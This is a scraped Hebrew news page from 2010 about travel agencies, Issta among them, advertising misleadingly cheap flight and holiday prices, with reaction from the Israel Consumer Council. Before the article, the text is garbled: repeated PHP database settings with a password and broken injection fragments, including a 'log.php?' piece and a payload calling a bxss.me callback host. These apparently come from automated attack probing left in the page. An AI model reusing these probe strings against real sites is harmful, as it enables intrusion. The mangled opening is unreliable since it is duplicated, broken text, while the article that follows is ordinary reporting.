$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> ספקי תיירות מפרסמים פרסומים מטעים בנוגע למחירי טיסות וחבילות נופש
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

פרסומים מטעים במחירי טיסות וחבילות נופש

תאריך: 04/10/2010 13:17   מחבר: מערכת האתר

ההסתמכות המוחלטת על רכישת שירותים באמצעות האינטרנט תוך ויתור במודע על הסוכן והיועץ האישי, עלולה לעלות לנו ביוקר. ברור לכול, שאין יותר נוח מאשר להזמין כרטיס טיסה או ביטוח לרכב באמצעות האינטרנט. בשביל מה לכתת רגליים ולהזיע בחודשי הקיץ הלוהטים. הכול בלחיצת כפתור.

ספקי השירותים  מודעים לטרנד הזה שקונה לו אחיזה הדרגתית בקרב קהלים, שנרתעו משימוש באינטרנט. עם הרחבת שירותי האינטרט יש גם לא מעט עוולות ופגיעות בצרכנים, שכל מבוקשם היה לרכוש מוצר איכותי ואמין וכמובן, באותו מחיר כפי שפורסם באתר של ספקי השירות.

מתלונות שהגיעו למועצה הישראלית לצרכנות ופורסמו גם בעיתון "גלובס" עולה כי סוכני נסיעות מפרסמים מחירים זולים לחבילות נופש ולטיסות. לקוחות מתלהבים מהמחיר הנמוך ומתקשרים להזמין. בפועל מתברר להם בהמשך, כי לא שמרו להם מקומות בטיסה שהזמינו. תוך כדי הודעת נציג הסוכנות על הביטול מציעים ללקוח טיסה בחברה אחרת במחירים הגבוהים במאות אחוזים מהמחיר שפורסם באתר הסוכנות. הלקוח נלחץ ונאלץ להסכים למחיר הגבוה שהוצע לו. פרסום המחיר הזול נועד לגרום ללקוח להתקשר לסוכנות הנסיעות, לבצע הזמנה, לאחר מכן לבטלה ביוזמת הסוכנות וכך לחבר אותו לספק תיירות אחר לצורך רכישת כרטיס טיסה במחיר הרבה יותר גבוה.

במועצה לצרכנות מסרו בתגובה לפניית "גלובס" כי "עסק הנוהג לפרסם מוצרים או שירותים שהוא יודע שאיננו יכול לספק - נוהג בחוסר תום-לב, ומעשיו מהווים הטעיה ולפיכך עבירה פלילית". למקרה שספק התיירות פרסם מחיר שגוי בטעות או בחוסר תום לב, עליו, לפי המועצה לצרכנות, החובה לפעול מיידית כדי לסלק את התקלה מהציבור מרגע שהתבררה הטעות. דרישה זו ישימה וקריטית במיוחד בערוץ האינטרנט. השינוי מתבצע בלחיצת כפתור. ספק שלא מתקן את הטעות מעיד על עצמו כי הוא מעוניין להמשיך במודע את הטעיית הציבור.

טיסה מבוטלת וממשיכה להתפרסם

במסגרת הכתבה ב"גלובס" סיפר אחד הלקוחות כי תיכנן לטוס לפריז עם משפחתו בחול המועד סוכות. לצורך כך החל בחיפוש טיסות בחודש יוני. באתר של חברת "איסתא" מצא טיסה בתאריך שרצה, במחיר 425  דולר לכרטיס , כולל הכול. תוך כדי הזמנת 5 כרטיסים נמסר לו כי הוא ברשימת המתנה ותשובה סופית תינתן תוך יומיים. נציגת מוקד "איסתא" אכן התקשרה ומסרה כי הזמנתו מבוטלת כי אין מקומות על הטיסה שהזמין והוצע לו לרכוש כרטיסים באמצעות חברת ארקיע במחיר כמעט כפול מזה שפורסם.

הלקוח בלע את הגלולה המרה והיקרה. כאן לא נגמר הסיפור שלא לומר החוצפה של איסתא. לדברי אותו לקוח, החברה המשיכה לפרסם באתר שלה את המחיר המקורי ואת מועדי הטיסה לפריז,שלפי הנטען בוטלו. יוצא מכאן, שספקי תיירות, יודעים על ההטעיה וממשיכים לפרסם אותה כאילו לא קרה דבר. 

לקוחה אחרת שיצרה קשר עם איסתא לאור פרסום מחיר טיסה לתאילנד בסך 630 דולר גילתה כי המחיר האמיתי הוא 1,040 דולר. פנייתה לבירור הפערים נענתה על ידי נציג איסתא כך: "הכרטיסים נגמרו לפני כמה חודשים טובים - זה עניין פרסומי".

עמדת המועצה

משרד התעשיה והמסחר באמצעות המועצה לצרכנות בודקים תלונות נוספות של לקוחות בעניין זה. לפניית "גלובס"מסרה עו"ד סלעית קולר מהמוצעה לצרכנות: " מבלי להתייחס למקרים הספציפיים, הבעיה העולה מהתלונות היא של הטעיה בפרסום, והכלל הוא שהפרסום צריך להציג דברים כהווייתם. פרסומת שנועדה למשוך צרכנים להתקשר או לבוא למקום העסקה ולגלות רק בדיעבד כי הדברים שפורסמו אינם נכונים או שהמוצרים שפורסמו לא מוצעים למכירה - היא בגדר פרסומת מטעה".

תגיות בעמוד:   המועצה לצרכנות    איסתא    הטעיה    חופשה    טיסות    כרטיסי טיסה    נופש    תיירות